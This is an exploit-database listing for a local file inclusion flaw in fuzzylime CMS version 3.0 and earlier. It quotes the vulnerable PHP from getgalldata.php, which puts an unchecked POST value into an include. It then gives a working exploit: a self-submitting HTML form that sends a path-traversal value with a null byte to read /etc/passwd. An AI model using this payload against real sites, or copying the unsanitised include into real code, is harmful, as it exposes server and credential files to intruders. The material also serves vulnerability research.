[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

fuzzylime cms <= 3.0 Local File Inclusion Vulnerability

Author
not sec group
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2117
Category
web applications
Date add
07-09-2007
Platform
unsorted
=======================================================
fuzzylime cms <= 3.0 Local File Inclusion Vulnerability
=======================================================



########################################################################
#################
#
#                           not sec group
#
#
#                      [fuzzylime (cms) <= 3.0]
#
# Class:         Local File Inclusion
# Found:       08/09/2007
# Site:           http://cms.fuzzylime.co.uk/
#Download:  http://cms.fuzzylime.co.uk/files/cms.zip
#
########################################################################
#################


                   vulnerable code:
       [cms]/code/getgalldata.php
______________________________________________________

1:    <?
2:    $p = $_POST[p];
3:    $m = $_POST[img];
4:    $m = "e$m";
5:    $entrytype = "gallery";
6:    include "../gallery/$p.inc.php";
7:    include "settings.inc.php";
8:    include "../$admindir/languages/english.inc.php";
...
41:   ?>
_______________________________________________________



       Exploit: ( Work only with magic_quotes_gpc = Off )
_______________________________________________________

<html>
<body onload="document.myform.submit()">
<form name="myform" action="http://www.site.com/[fuzzylime]/code/
getgalldata.php" method="post">
<input name="p" type="text" size="30" value="../../../../../../../../
etc/passwd%00" />
</form>
</html>
________________________________________________________




#  0day.today [2024-12-24]  #